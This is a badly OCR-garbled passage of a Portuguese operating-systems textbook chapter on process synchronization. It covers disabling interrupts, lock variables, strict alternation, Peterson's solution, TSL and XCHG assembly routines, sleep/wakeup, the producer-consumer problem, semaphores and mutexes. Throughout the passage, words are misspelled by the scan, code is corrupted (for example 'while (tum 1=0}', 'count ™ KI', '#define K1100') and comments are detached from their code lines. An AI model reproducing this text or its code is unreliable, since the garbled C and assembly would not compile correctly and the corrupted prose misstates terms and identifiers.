

B tenta entrar 
na regiao 
crftica 


B entra na 
regiao cntica 


B deixa a 
regfao cntica 


; / . ' / ;/ 


B bloqueado 


Tempo 


Figura 2.17 Exclusao miitua usando regioes crfticas. 


menie como um resuJtado da inierrupęao do rdógio ou de 
outra hiterrupęao. Com as imerrupęocs dcsligadas, a CPU 
nao sera mais chaveada para outro processo. Assim, unia 
vez que tenha desabilitado as interrupęoes, um processo 
pode verificar e atualiżar a memória cómpartilhada sein te- 
mer a intervenęao de um outro processo. 

De modo geral, essa abordagem nao e interessante, 
porąue nao e prudente dar aos processos dos usuarios o 
poder de desligar interrupęoes, Suponha que um deles te- 
nha fcilo isso e nunca mais as tenha ligado, Esse poderia 
ser o fun do sistema. Alem disso, se o sistema for um multi- 
processador (com duas ou mais CPUs), desabilitar as inter¬ 
rupęoes afetora somente a CPU quc executou a instruęao 
disable (desabilitar), As out ras continuarao executando e 
lendo acesso a memória cómpartilhada. 

Por outro lado, frequentememe corwem ao próprio 
nucleo desabilitar interrupęoes, para algumas poucas ins- 
truęócs, enąuanio cstiver alterando variaveis ou listas. Se 
ocorrer unia interrupęao — por emnplo, enquanto a lista 
de processos prontos estiver em um estado inconsisten- 
te —v po dera havcr condięóes de corrida. A condusao e: 
desabilitar interrupęoes muitas vezes ć uina tecnica basta li¬ 
te util denlro do próprio sistema operacional, mas inade- 
quada como um mecanismo geral de exdusao mutua para 
processos de usuario, 

A possibilidade de realizar exclusao mutua desabilitan- 
do interrupęoes — mesmo dentro do nucleo — esta se lor- 
nando menor a cada dia cm vinude do nu mero crescente 
de chips mu Iti nucleo a te cm PCs populares. Dois nucleos ja 
sao comims, ąuatro estao presentes em maquinas sofisiicadas 
e oito ou 16 virao em breve. Em um sistema multkore (mul- 
tiprocessador), desabilitar as intermpęoes de urna CPU nao 
impede que o u tras CPUs interfiram nas operaęóes quc a 
primeira CPU esta executando. Comeąuenteniente, esque- 
mas mais sofisiicados sao necessarios. 


Variaveis do tipo trava (lock) 

Como urna segunda tentativa, busąuemos urna soluęao 
de software. Considere que baja u ma unica variavel com- 
panllhada (trwa), inicialmeme contendo o valor 0. Para 
entrar em su a regiao cntica, um processo tesla a mes se ha 
trava, yerifkandn o vaior da variavel traya. Se trwa for 0, o 
processo altera essa variavel para 1 c entra na regiao crftica, 
Se trava\i estiver com o valor C o processo simplesmente 
aguardara a te que da sc tonie 0, Assim, um 0 signitka que 
nenhum processo esta cm sua regiao crftica e um 1 indica 
que algum processo esta em sua regiao cntica, 

Infelizmentc, essa ideia apresenta exatamente a mes- 
ma falha que vimos no diretório de spool. Suponha qne 
um processo leia a variavel mmi e veja que da e 0. Ames 
que possa alterar a variavel trwa para 1, outro processo e 
escalonado, executa e altera a variavel mmi para 1. Ao exe- 
cuiar novamente, o primeiro processo tarnbem colocara l 
na variavel tremie, assim, os dois processos estarao em suas 
regioes crfticas a o mesmo tempo. 

Agora voce pode pensar que seria possfvel contornar 
esse problema lendo primeiro a variavel trwa e r entao, veri- 
fkaria novamente ( um pouco antes de armażenada. Mas de 
que isso adiantaria? A disputa entao ocorreria se o segundo 
processo modificassc a variavd trava um pouco depois de 
o primeiro processo ter terminado sua segunda verificaęao, 

Chaveamento obrigatório 

Um tcrceiro modo de lidar com o problema da exclu- 
sao mutua e ilusirado na Figura 2.18. Esse fragmento de 
programa — como ąuase todos os outros desie livro — fol 
cscrilo em C. C foi escolhida aqui porque os sistemas ope¬ 
ra donais reais sao quase todos escritos em C (ou, ocasio- 
nalmentc, cm C++), mas muito di Ikil men te cm Linguagens 
como Java # Mo cl u la 3 ou Pascal. C ć urna Jinguagem po- 
derosa, eficieme e previsfveL caractensticas fundamemais 
para cscrever sistemas operacionais. Java H por exemplo P 
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while (TRUE) { 

while (tum 1=0} /* laęo 7; 

critical_region(); 
tum -1; 

noncrittcaLregion(}; 

} 

(a) 

while (TALIE) { 

while (tum !=1) /* laęo 7; 

critical_region(); 
tum - 0; 

noncriticaLregion(); 

] 

(b) 

Figura 2.18 Soluęao proposta para o proptema da regiao 
cntica. (a) Processo 0. (b) Processo 1. Em ambos os casos, 
nao deixe deobservar os ponto-e-yirgulas conduindo os 
comandos while. 

nao ć prcvisfvel porque a memória pode se esgotar cm um 
momcnto critico, sendo prcciso irwoear o colctor dc lixo 
{garbage coikcior) cm urna hora inoportima. Isso nao acon- 
tcccria com C, em quc nao ha coleta dc lixo. Unia com- 
paraęao quanliialiva entre C, C++, Java e on tras quatro 
linguagens pode ser yerificada em Prechdl (2000), 

Na Figura 2.1S, a variavel inteira tum, inidalmente 0, 
serve para controlar a vcz dc quem entra na regiao cntica c 
verifica ou atualiza a memória compartiIliada. Inidalmcn- 
tc, o processo 0 inspcciona a variavc3 tum, cncontra la o 
valor 0 c cnlra cm su a regiao cntica. O processo I tambćm 
cncontra la o va3or 0 c, en tao, fica cm um laęo fechado 
testando coutinuamentc para ver ąuando a variavel tum 
se toina ]. Testar cominuamente urna variavel ate que 
algum valor apareęa e cha mado de espera ociosa (bttsy 
waitmg), A espera ociosa dcveria em gerał ser evitada r ja 
que gasła tempo de CPU. Somente quando ha u ma expec- 
tativa razoavel dc que a espera seja breve e quc ela e osada. 
Urna variavd dc trava que usa a espera ociosa c chamada 
dc trava giratória (spin lock). 

Quando dcixa a regiao cntica, o processo 0 poe a 
variavel tura em I, para permitir que o processo l enire 
em sua regiao cntica. Suponha que o processo 1 tenha 
terminado rapidameme sua regiao cntica e, assim, ambos 
os processos nao estejam em su as regides crfticas, com a 
variavel tum em 0. Agora, o processo 0 executa todo o 
sen laęo rapidamenle, saindo de sua regiao crftica c colo- 
cando a variavcl tum em 1. Ncssc porno, a variavel tum 
e 1 e os dois processos eslao cxecu lando cm suas regides 
nao-eriiicas. 

De repente, o processo 0 temiina sua regiao nao cntica 
e volta ao infcio de seu laęo. Infelizmente, a ele nao sera 
permitido entrar em sua regiao crftica agora, pois a variavel 
tum esta em 1 c o processo 1 esta ocupado com sua regiao 


nao cntica. O processo 0 fica suspenso em seu laęo while ale 
que o processo 1 coloąue a variavel tum em 0. Em outras 
palavras, cłiavear a vez nao e urna boa ideia quando um 
dos processos for muito mais lento que o outro. 

Essa situaęao viola a condięao 3 estabdecida anierior- 
mente; o processo 0 esta sendo b!oqueado por um processo 
que nao esta em sua regiao cntica. Voltando ao diretório de 
spod discuiido ha potico, se associassemos agora a regiao 
crftica com a leitura e com a escrita no diretório de spool, 
nao seria permitido a o processo 0 imprimir outro arquivo, 
pois o processo 1 estaria fazendo oittra coisa. 

Na vcrdadc, essa soluęao rcquerquc os dois processos 
chaveiem obrigatoria menie a entra da em stias regides m- 
ticas para, por exemplo, enviar sens arquivos para o spool. 
Nao seria permitido a nenii um deles colocar ao mesmo 
tempo dois arquivos no spool. Embora esse algoritmo evite 
todas as dispmas, de nao ć urn candidato realnienie serio 
para urna soluęao, pois vio!a a condięao 3, 

Soluęao de Peterson 

Combinando a ideia de alternar a vez (com a varia- 
vd tum) com a ideia das variaveis de trava e de adver- 
lencia, T. Dekker, um matemaiico holandes, desenvoIveu 
unia soluęao de software para o problema de exdusao 
mulua que nao reąueira um chaveamento obrigaiório. 
Para urna disenssao sobrc o algoritmo dc Dekker, vcja 
Dijkstra (1965). 

Em 1981, G. L. Peterson descobriu um modo miiito 
mais simples de fazer a exclusao mutna, tornando obsoleta 
a soluęao de Dekker. 0 algoritmo de Peterson ć most rado 
na Figura 2J9, Ele consiste cm duas rotinas cscritas cm 
ANS! C, o que sigm lica quc dois prolótipos de limęocs de- 
vem ser fornecidos para todas as funęoes definidas e usa- 
das. Gont u do, para economizar espaęo, nao mostraremos 
os protótipos nesse exemplo nem nos subseąuentes, 

Antes de usar as variavds compartilliadas (ou seja, an- 
tes dc entrar em sua regiao cntica), cada processo chama 
entzrjregion com seu próprio nu mero de processo, 0 ou 1, 
como para metro. Essa chamada fara com que ele lrque es- 
perando, se necessario, ate que seja segitro entrar Depois 
qite terminou dc usar as variavcis comparti]hadas, o pro¬ 
cesso chama learejegion para indicar seu termino e permi- 
tir que outro processo entre, se assim desejar. 

Vejamos como essa soluęao funciona, Inicialmcn- 
le, nenhum processo esta em sua regiao crftica. Entao, o 
processo 0 chama enterjre$ion. Ele manifesta seu interesse 
escrevendo em seu elemento do arranjo intemud e poe a 
variavel tum em 0. Como o processo I nao esta interes- 
sado, enler_rąjłon retorna imediatamente. Se o processo 1 
cha mar enter_re§wn agora, ele ficara suspenso ali ate que 
imemieĄ 0] va para FAL SE, um evento que ocorre somente 
q uan do o processo 0 cha mar laive_re<jion para sair de sua 
regiao cntica. 
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#define FALSE 0 
tfdefine TRUE 1 
#define N 2 

/* numero de processos */ 

int turn; 

int interested[N]; 

/* de quem e a vez? */ 
f* todos os valores 0 (FALSE) */ 

void enter_region(int process); 

{ 

int other; 

/* processo e O ou 1 *1 

f* numero de outro processo */ 

other = 1 - process; /* o oposto do processo */ 

Interested[process] = TRUE; !* mostra que voce esta interessado */ 

turn = process; /* altera o va!or de tum */ 

while (turn == process && interesteci[other] == TRUE) /* comando nulo */; 


} 


void leave_region(int process) /* processo: quem esta saindo */ 

f 

interested[process] - FALSE; /* indica a salda da regiao crftica */ 

1 


I Figura 2.19 A sofuę&o de Peterson para implementar a exclus§o mutua. 


Considere agora o caso em que os dois processos cha- 
mani Mikroregion quasc simultaneamente. Ambos armaze- 
narao sens numeros dc processo na variavel turn. O quc 
armazenou por ultimo c o quc conia — o primciro e so- 
breposto c perdido. Suponha quc o processo 1 escreva por 
ultimo; desse modo, a variavcl ntm eon te m l, Quando am¬ 
bos os processos diegam ao comando wbite, o processo 0 
nao executa o laęo e emra em sua regiao crftica. O processo 
! exeeuta o laęo e nao emra em sua regiao crftica ate que o 
processo 0 saia de sua regiao crftica. 

A Instruęao TSL 

Agora estudemos uma propos ta que rcquer urn peąue- 
no auxflio do hardware. Muitos computadores — especiab 
menie aąueles projeiados com muliiplos processadores — 
tern inna instruęao 

TSL RX,LOCK 

(test and set lock — teste c arna liże variavel dc trava) f que 
funciona da seguinte mandra: ela te o conteudo da memó¬ 
ria, a palavra lock, no registrador RX e, entao, armazena urn 
valor diferente de zero no endereęo de memória lock, As 
opera ęoes de teiiura e armazenamento da paiavra sao segu- 
ra menie indivisiveis — nenhum outro processador pode ter 
acesso a palavra na memória enquanto a instruęao nao ter- 
minar. A CPU qne esta executando a instruęao TSL impede 
o acesso ao barramento dc memória para proibir que ouiras 
CPUs ten ha m acesso a memória enqnantocla naoterminar. 

fi importame notar que impedir o barramento de me¬ 
mória e muito di Terenie de desabiliur interrupęóes* Desa- 
bilitar interrupęoes e depois exeastar a leimra de uma pa- 
lavra na memória seguida pela escrita nao impede que urn 


segundo processador no barramento acesse a palavra entre 
a lei tura e a escrita. Na verdade, desabilitar interrupędes 
no processador 1 nao tem nenhum efcito sobre o proces¬ 
sador 2. O unico modo de evitar que o processador 2 entre 
na memória ale que o processador 1 tenha icrminado ć 
impedir o barramento, o que requer urn equipa niemo de 
hardware espedal (ba si ca menie, uma iinha de barramento 
assegurando que o barramento seja impedido e que nao 
esteja dispomvel para outros processadores alćm daqucle 
que o impediu). 

Para usar a instruęao TSL, partiremos de uma variavel 
dc trava compartilhada, lock, para coordenar o acesso a me¬ 
mória cotnpartilhada. Quan.do a variavel lock for 0, qual- 
quer processo pod era torna-la 1 usando a instruęao TSL e, 
entao, lerou escrever na memória cotnpartilhada. LJuando 
termiuar, o processo colocara a variavel bek de volta em 0, 
lanęando ma o de uma instruęao ordinaria move. 

Como essa instruęao pode ser usada para impedir que 
dois processos entre m sim u Hanca nieme em suas regióes 
crfticas? A soluęao e dada na Figura 2.20. La e most rad a 
uma sub-rotina de quatro lustru ęoes em uma linguagcm 
asscmbly Octicia (mas tfpica). A primeira instruęao copia 
o valor anterior da variivd lock no registrador e poc a va- 
riavel locke m 1. Entao, o valor anterior e comparado com 
0. Se o valor anterior nao for 0, cle ja es tara impedido; 
assim, o programa apenas voltara ao infcio e testara a va- 
riavel novamente + Cedo ou tarde a vańavd se tornara 0 
(quando o processo delxar a regiao crftica em que esta) e 
a sub-rotina retornara, com a variavd lock em l. A trava e 
bastame simples. O programa apenas armazena urn 0 na 
variavd lock , Ncuhuma instruęao espedal e neeessiria. 




Sn$w 


Capftulo 2 Processos e threads 75 


enter_region: 

TSL REGlSTER r LOCK | copia lock para o registrador e poe lock em 1 
CMP REGISTER,#0 | lock valia zero? 

JNE enter_region [ se fosse diferente de zero, lock estaria ligado, portanto, continuę no lago de repetięao 

RET I retorna a quem chamou; entrou na regiao crftica 


leave_ region: 

MOVE LOCK S #0 | cologue 0 em lock 

RET j retorna a quem chamou 

I Fi g u ra 2.20 Entrando e sa indo de urna reg iao c ritica usando a i n st ruęao TSL, 


U ma soluęao para o problema de regiao crftica e agora 
direta. Antes de emrar em sua regiao crftica, um processo 
chama enłer_ręgiott, que faz u ma espera ociosa a te qne ele 
esteja iivre de trava; entao ele yerifica a variavel lock e re¬ 
torna. Depois da regiao crftica, o processo chama leawjre* 
ijion, quc póc um 0 na variavel lock. Assim como todas as 
soluęocs bascadas cm regioes critkas, o processo devc cha- 
mar cnkr_rą]ion c kavc_rqjion em moment os co rr cl os para 
o metodo funcionar. Se um processo u apacearo a exclusao 
inuiua falhara. 

Urna instruęao alternativa a TSL e XCHG 1 , que troca os 
conteudos de duas posięoes atom i ca menie, por exemplo, 
um registro c unia palavra de incmória. O códtgo e mostra- 
do na Figura 2.21 e, como pode ser visto, ć basicameme o 
mesmo da soluęao com TSL Todas as CPUs Intel xS6 u sam 
instruęoes XCHG para sincronizaęao de baixo nivel. 

2,5.41 Dormir e acordar 

A soluęao de Peterson e a soluęao com base em TSL 
ou XCHG sao corretas, mas ambas apresentam o defeito de 
precisar da espera ociosa. Em essenda, o que essas soluędes 
fazem e: quando quer emrar em sua regiao crftica, um pro¬ 
cesso yerifica se sua entrada e permitida. Se nao for, de fi ca¬ 
ra cm um lago esperando atc que seja permitida a entrada. 

Esse metodo nao só gasła tempo de CPU, mas tam- 
bem pode ter efeitos inesperados. Considere um compu- 
tador com dois. processos: H, com alta prloridade, e L, com 
baixa prioridade. As regras de escalonamemo sao tais que 


H e eseemado sempre que esttver no esiado pronto. Em 
ceito memento, com L em sua regiao crftica, H torna-se 
pronto para executar (por exemplo, termina unia operaęao 
de E/S). Agora H inicia urna espera ocupada, mas, como L 
nunca e escalonado enąuanto // esta executando, L nunca 
leni a oportunidade de dcixar sua regiao crftica e, assim, 
H fica em um laęo infiniio. Essa situaęao algumas vezes e 
referida como o problema da inve.rsao de prioridade. 

Agora, observemos algumas primilivas de comurii- 
caęao entre processos que bloqueiam em vez de gasi ar 
tempo de CPU, quando a eias nao e permitido entrar em 
suas regioes cnticas. Urna das mais simples e o par sleep e 
wakeup. Sleep e urna cha ma da de sistema que faz com que 
o processo que a chama durnia, isto c, liquc suspenso ale 
que um ouiro processo o desperte. A cha ma da wakeup tem 
um para metro, o processo a ser despertado* Por ouiro lado, 
tamo sleep quanto wakeup podem ter outro para metro, um 
endereęo dc memória usado para eąuiparar os wakeups a 
seus respectivos sleeps. 

O problema do produtor-consumidor 

Como um exemplo de como essas primitwas podem 
ser usadas, considcremos o problema produtor-consu- 
midor (tambem conhecido como problema do buffer li- 
mitado). Dois processos coinparlilhani um buffer coinurn 
e dc lamanho flxo, Um deles, o produtor, poe informaęao 
dentro do buffer e o outro, o consumidor, a retira. (Tam¬ 
bem e possivel generalizar o problema para m produtores 


enter_ region: 

MOVE REGISTER h #1 I insira 1 no registrador 

XCHG REGI STER,LOCK i substitua os conteudos do registrador e a yariaęao de fock 
CMP REGfSTER,#0 I lock yalia zero? 

JME enter_region I se fosse diferente de zero, lock estaria ligado, portanto continuę no laęo de repetięao 

RET I retorna a quem chamou; entrou na regiao crftica 


leave region: 

MOVE LOCK,#0 I cologue 0 em lock 

RET I retorna a quem chamou 

1 Figura 2.21 Entrando e saindo de urna regiao critica usando a instruęao XCHG, 


L Do inglci exdiafhie - troca |N T ,R.T3. 
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e n consumidores, mas somente consideraremos o caso de 
um produtor e de um consumidor, pois essa hipólese sim- 
plifica as solnęoes.) 

0 problem a se origina quando o produtor quer colocar 
um novo iłem no buffer, mas de ja esta cheio, A soluęao e 
por o produtor para dormir e só despertado ąuando o con- 
sumidor remover um ou mais itens. Da mesma maneira, se 
o consumidor quiser remover um item do buffer e perceber 
que esta vaz!o, cle dormira ate que o produtor ponha algo 
no buffer e o desperie. 

Esse metodo parece bastame simpłes, mas acarreta os 
mesmos tipos de condięoes de corrida que vimos amerior- 
mente com o diretório de spool. Para manier o conirole 
do numero de ileus no buffer, precisaremos de urna varia- 
vel r count. Se o numero maximo de itens que o buffer pode 
co nter for N, o cod i go do produtor verificara primeiro se o 
valor da variavel count e N. Se for, o produtor dormira; do 
contrario, o produtor adicionara um item e inerementara a 
variavcl count. 

O código do consumidor e similar: primeiro verifica se 
o valor da variavel count e 0. Em caso afirmativo H val dormir; 
se nao for 0, remove um item e decresce o contador de 1, 
Gada um dos processosiambem tesla se o outro deveria estar 
acordado e, em caso afirmativo, o eksperta, O código para 
ambos, produtor e consumidor, e mostrado na Figura 2,22. 


#define K1100 
int count - 0; 

void producer(void) 

{ 

int item; 

while (TRUE) { 

item = produce itemf); 

if (count ™ KI) sleep(); 

insert. Item (item); 

count = count + 1; 

if (count -- 1) wakeup(consumer); 

} 

i 


void consumer{void) 

{ 

int item; 

whiie (TRUE) { 

if (count -- 0) sleep(); 
item = remove_item(); 
count - count - 1; 

if (count == N - 1) wakeup(producer); 
con$ume_item(item); 

} 

} 


Para expressar cha mad as de sistema como sleep e 
wakeup em C, elas sera o mostradas como chamadas de roti- 
nas dc bibliotcca, Elas nao sao parte da bibliotcca C padrao, 
mas prosu m i vd men te estariam dispomvds em qualquer 
sistema que de fato tivesse essas chamadas de sistema, As 
rotinas insert Jtmz removeJtem f que nao sao mostradas, in- 
serem e removem itens do buffer 

Agora voltemos a condięao de disputa, Ela pode ocor- 
rer pelo fato de a variavd count ter accsso irrestriio. Seria 
possivel ocorrer a seguinte situaęao: o buffer esta vazio c 
o consumidor acabou dc ler a variavel count para verificar 
se sett valor e 0, Nesse instante, o escalonador dcci de pa¬ 
ra r de execntar o consumidor temperariamente e comeęa a 
executar o produtor. O produtor insere um item no buffer, 
ineremema a variivel count e percebe que seu valor agora e 
L fnferindo que o valor de count era 0 e quc o consumidor 
deveria ir dormir o produtor chama wakeup para acordar 
o consumidor, 

Infdizmente, o consumidor ainda nao esta logfćamen- 
te adormeddo; entao, o sinal para acordar e perdido. Na 
próxima vez em que o consumidor executar f testara o valor 
de count anterionnente lido por de r verifkara que o valor e 
0 e dormira, Mais cedo ou mais taicie o produtor preen- 
chera todo o buffer e tambem dormira, Ambos dormirao 
para sempre. 


/* numero de lugares no buffer */ 
/* numero de itens no buffer */ 


h repita para sempre *ł 
f* gera o próximo item */ 

/* se o buffer estiver cheio. va dormir +/ 

/* ponha um item no buffer */ 

/* ineremente o contador de itens no buffer */ 
/* o buffer estava vazio? */ 


h repita para sempre +/ 

I* se o buffer estiver cheio, va dormir */ 

/* retire o item do buffer *J 

/* decresga de um o contador de itens no buffer */ 

f* o buffer estava cheio? */ 

/* imprima o item */ 


I Figura 2,22 O probiernia produtor-consumidor com u ma condic^o de disputa tatar. 
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A essencia do próbie ma aqui e que se perde o envio de 
urn sina! de acordar para um processo que (ainda) nao esta 
dormindo. Se ele nao fosse perdido, uido fimdonaria. Urna 
soluęlo rapida e modificar as regras, adidonando ao eon- 
tcxto um bit de espera pelo sinal de acordar {wakeup 
waitimj bit). Quando um sinal dc acordar c cnviado a um 
processo quc ainda esta acordado, csse bil e liga do, Depois, 
quando o processo teniar donnin se o bit de espera pelo sinal 
de acordar estiver liga do, ele sera desligado, mas o processo 
permanecera acordado. O bil de espera pelo sinal de acor¬ 
dar e na verdade um cofrinho que guarda sinais de acordar. 

Mesmo quc o bil de espera pelo sinal dc acordar tenha 
salvado o dia nesse cxcmplo simples, ć faril pensar cm ca- 
sos com tres ou mais processos nos ąuais um bil de espera 
pelo sinal de acordar seja insuficiente. Poderfamos fazer 
ouira improvisaęao e adicionar um segundo bil de espera 
pelo sinal de acordar ou talvez oiio ou 32 deles, mas, em 
prindpio, o próbie ma ainda exisiira. 

2.5.51 Semaforos 

Essa era a situaęao cm 1965, ąuando E, W. Dijksira 
(1965) sugeriu usar uma variavel imeira para coniar o nu- 
mero de sinais de acordar salvos para uso futuro. De acor- 
do com a proposia delc, foi imroduzido ujn novo tipo de 
variavel, cha mado semaforo, Um semaforo poderia conter 
o vaJe>r 0 — indicando quc nenhum sinal de acordar fol 
salvo — o u alguin valor posiiivo se um o u mais sinais dc 
acordar estivessem pendent es. 

Dijkstra propos a existenda de dnas opeiaęoes, down e 
up (gen era lizano es de sEeep e wakeup, respectivamente). A 
operaęao down sobre um semaforo verifica se sen vałor e 
maior que 0. Sc for, decrcmentara o valor (isto e, gasta um 
sinal de acordar armazenado) e prosseguira. Se o valor for 
0, o processo sera posto para dormir, sem terniinar o dowa 
pelo menos por enquanto. Yerificar o valor, altera-lo e pos- 
sivelmenic ir dormir sio tarefas executadas lodas como uma 
unka aęao atomica e mdivisfvd. Garante-sc quc, uma vcz 
iniciada uma operaęao de semaforo, nenhum outro proces- 
so pode ter acesso a o semaforo ale que a operaęao tenha 
terminado ou sklo bIoqucada. Essa atomMdade e absoluta- 
mcnie essencia! para resoJver osproblemas de sincromzaęao 
e evfrar condięoes de corrida. Aęoes atomicas, em que um 
grupo de opera ędes reladonadas e toialmenie execuiado 
sem irilerrupęoes ou nao e exeeutado em absolut o, sao cx- 
trema nieme importanles cm muiias out ras areas da cicnria 
da computaęao tambem. 

A operaęao up inerementa o valor de um dado semafo¬ 
ro. Se um ou mais processos estivessem dormindo naquelc 
semaforo, incapadtados de terminar unia operaęao down 
anterior, urn deles seria escolhido pelo sisteina {por excm- 
plo, alcatoriamente) c seria dada a permissao para terminar 
seu down, Portanto, depois de um up cm um semaforo com 
processos dormindo nele, o semaforo permanecera 0, mas 
bavera um processo a menos dormindo nele. A operaęao 


de inerementar o semaforo e acordar um processo tambem 
e indivisfvel. Um processo nunca e bloqueado a partir de 
um up — assini como, no modele anterior, um processo 
nunca e bloąueado fazendo um wakeup. 

No irabalho origmal de Dijkstra foram tisadas as pri- 
mitivas P e V em vez de down e up, respectivamente. Mas 
como P e V nao possuem um significado mnemonico para 
as pessoas que nao faiam holandes (e somente uma alusao 
pouco especffica para aqtieles que falam), usaremos os ter¬ 
mos down e up, Esses mecanismos foram introduzidos na 
llnguagem dc programaęlo Algol 68. 

Reso!vertdo o problema produf or-consumidor usando 
semaforos 

Semaforos resolvem o problema da perda do sinal de 
acordar (como mostra a Figura 2.23). Para que eles fum 
cioncrn corre ta menie, ć essencial que sejam implementa- 
dos dc mancira indivisivcl. O modo norinal c baseado na 
implemcmaęao de up e down como chamadas dc sislema, 
com o sislema operacional desabilitando lodas as imer- 
rupęoes por umbreve momento enąuamo esiiveriestando 
o semaforo, atualizando-o e pondo o processo para dormir, 
sc neccssario. Como todas essas aęoes requerem somente 
algumas insrruęoes, das nao resultam em danos ao desa- 
biliiar as interrupęoes. Se miiltiplas CPUs estiverem sendo 
usadas, ca da semaforo devera se r protegido por uma varia- 
vd de tra va, com o uso da instruęao TSL para assegurar que 
somente uma CPU por vcz verificara o semaforo, 

Yeja se voce emendeu bem: o uso da TSL ou de XGHG 
para impedir que varias CPUs tenham acesso simultaneo ao 
semaforo ć muito diferente da espera ocupada provocada 
pelo produtor ou pelo consumidor, aguardando que o outro 
esvazie ou preencha o buffer. A operaęao de semaforo dtt- 
rara somente alguns microssegundos; ja o produtor ou con¬ 
sumidor pode demorar um tempo arbitrariatnente longo, 

Essa soluęao usa tres semaforos: um chamado fuli , 
para eon tar o numero de lugares que estao preenchidos, 
um chamado empty, para contar o mi mero de lugares que 
estao vazios e um chamado mitiex, para assegurar que o 
produlor e o consumidor nao tenham acesso ao buffer ao 
mesmo tempo. Fuli e inidalmente 0, empty e iniciaimente 
igual a o numero dc I u gar es no buffer e mutex iniciaimente 
e 1. Semaforos que iniciam com I e sao usados por dois ou 
mais processos — para assegurar que somente um deles 
possa entrar em sua regiao critica ao mesmo tempo — sao 
chamados semaforos binarios, Se cada processo fi zer um 
down logo anles de entrar em sua regiao critica e um up 
logo depois de sair dela, a exdusao miitua esta garantida. 

Agora que temos uma boa unidade basica de co mu ni- 
caęao entre processos a nossa disposięlo, observemos ou- 
tra vez a seąuencia de interrupęoes da Tabela 2,2. Em um 
sislema baseado no uso de semaforos, o modo namral de 
ocultar inlerrupęoes e ter um semaforo, iniciaimente em 
0, assodado a cada dlspositivo de E/S. Logo depois de i ni- 
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tfdefine N 100 
typedef int semaphore; 
semaphore mutex = 1; 
semaphore empty - N; 
semaphore fuli = 0; 

void producer(void) 

{ 

Int iłem; 

while (TRUE) { 

item ~ produce ttem(); 

down(&empty); 

down(&rmjtex); 

insert_item(item); 

up(&mutex); 

upf&full); 

} 

} 


void corsumer(void) 

{ 

int item; 

while (TRUE) { 
down(&full); 
down(&rmitex); 
item = remove_item(}; 
up(&mutex); 
up(&empty); 
consume_[tern(item); 

} 

} 

i Figura 2.23 O probfema produtor-consumidor usando 


/* numero de iugares no buffer*/ 

/* semaforos sao um tipo espeeia! de int */ 
/* controla o acesso a regiao critica */ 

/* conta os iugares vazio$ no buffer */ 

/* conta os Iugares preenchidos no buffer */ 


/* TRUE e a constante 1 */ 

/* gara algo para pór no buffer */ 
i* decresce o contador empty */ 

/* entra na regiao critica */ 

/* poe novo item no buffer */ 

/* sai da regiao critica */ 

/* incrementa o contador de iugares preenchidos */ 


/* laęo infinito */ 

/* decresce o contador fuli */ 

/* entra na regiao critica */ 

/* pega item do buffer */ 
ł* sai da regiao critica */ 

/* incrementa o contador de Iugares vazios */ 
/* faz algo com o item */ 


rializar um dispositivo de E/S, o processó de gerenciamen- 
10 faz um down sohrc o semaforo assodado, bloąucando 
o processo imedialarncnte. Quando a intcrrupęao chega, 
o iraLaniemo de interrupęao faz urn up sobre o semaforo 
assodado, que toina o processo em ąuestao pronto para 
executar novamente. Nesse modelo, o passo 5 na Tabela 
2.2 consiste em fazer um up no semaforo do dispositWo, dc 
modo que no passo 6 o escalonador scja capaz de cxecutar 
o gerendador de dispositim Claro, sc varios processos es- 
iiverem prontos, o escalonador pod era cscolhcratc mesmo 
um processo mais im port antę para executar. Alguns dos 
algoritmos u sad os para escalonamento de processos sera o 
estudados posterionnente, neste mesmo capimi o. 

No exemplo da Figura 2.23, usamos semaforos de duas 
manciras difcrcntes. Essa difercnęa ć muito importantc e 
merece ser explicitada. O semaforo mułexć usado para ex- 
dusao m litu a, Ele e destinado a ga ran tir que somente um 
processo por vez esteja lendo ou cscrevendo no buffer e em 
variavds assoriadas. Essa exdusao mutua e necessana para 
i mpedir o ca os. Na próxima seęao r estudaremos mais sobre 
a exdusao mutua e como consegui-la. 


O outro uso dos semaforos e voltado para smeroniza- 
ęao. Os semaforos fuli e empty sao necessarios para garantir 
que certas seąucndas de eventos ocorram ou nao — asse- 
guram que o produtor parę de executar quando o buffer 
estiver che i o e que o consumidor parę de exeaitar quando 
o buffer se encontrar o ci oso. Esse uso e diferente da exclu- 
sao mutua. 

2.5.61 Mutexes 

Quando nao c prcciso usar a capaddadc do semaforo 
de contar, lanęa-se mao de u ma versao simplificada dc se¬ 
maforo, cha mada mmex (abreviaęan de mutual €xclusion f 
exclusao mutua)* Mutexes san adeąuados apenas para ge- 
renciar a exdusaó mutua de algum recurso ou parte de có- 
digo compartilhada. Sao faceis de implememar e eficientes, 
o que os torna espeeiaImente uteis em paeotes de threads 
implememados totalmente no espaęo do usnario. 

Um miitex e u ma variavel que pode estar em um dos 
dois estados seguintes: desimpedido ou impedido* Cnnse- 
quemememe H somente 1 bit e necessario para represenU-lo, 
mas, na pratica, muitas vezes se usa um intdro, com 0 para 
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desimpedido e qiialquer ornro valor para impedido. Duas roti- 
nas sao usadas com mutexes. Quando um thread (on proces¬ 
so) precisa ter acesso a unia regiao crftica, cle chama mukx_ 
lock. Se o mutex esriver desimpcdido (indicando quc a regiao 
cni i ca csta disponfrel), a cha ma da prosscguira c o thread que 
cha mon mutexJock ficara livrc para entrar na regiao crftica. 

Por outro lado, se o mutex ja estiver inipedido, o 
thread que chamou mutexJock permanecera bIoqueado ate 
qne o thread na regiao crftica termine e chame mutex_tmlo~ 
cL Se mdltiplos threads estiverem bloqueados sobre o mu- 
tex r um deles sera escolhido aieatoriamente e libcrado para 
adquirir a !rava. 

Por serem muito simples, os muiexes podem ser im- 
plememados facilmente no espaęo de usuario, se houver 
unia instruęao TSL ou XCHG dkponivel Os códigos de 
niutexJock e mutex_unlock r para que sejatn u sad os com um 
pacote de threads de usuario, sao mostrados na Figura 
2-24. A soluęao com XCHG e essencialmeme a mesma* 

O código do mulexJock e simitar ao código do enier_ 
region da Figura 2.20, mas com urna diferenęa fundamen- 
tal. Quando falha ao enirar na regiao crftica, o enter_re$ion 
continua testando repetldamente a variavel de trava (es- 
pera ociosa). Ao finał o tempo de CPU se esgota e algum 
outro processo e escalonado para executar. Ccdo on tar- 
de o processo que detem a trava e executado e o libera. 

Com threads (de usuario), a skuaęao e diferente por- 
que nao ha relógio que parę os threads que estiverem exe- 
cuiando ha muito tempo. Consequentememe, um thread 
que tentar obter a variavel de trava pela espera ociosa fi ca¬ 
ra em um laęo infinito e nunca conseguira obter essa vari- 
avel, pois ele nunca permitira que qualquer outro thread 
execute e libere a variavel de trava> 

Eis a diferenęa entre emer_region e tmtłexJock: quali¬ 
do fallia em verificar a variavel de trava, mutex_lock chama 
